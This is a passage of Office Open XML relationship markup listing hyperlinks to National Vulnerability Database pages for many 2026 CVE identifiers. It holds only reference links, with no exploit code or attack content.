Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69420" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69424" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69432" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69433" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69436" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69444" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69445" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69447" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69450" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69455" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69459" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69467" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69478" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69480" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69508" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69509" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69513" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69528" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69534" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69535" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69538" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69541" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69542" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69544" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69561" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69576" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69582" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69585" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69592" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69604" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69608" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69612" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69685" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69691" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69720" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69725" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69731" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69758" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69785" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69790" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69799" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69801" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69821" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69822" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69841" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship 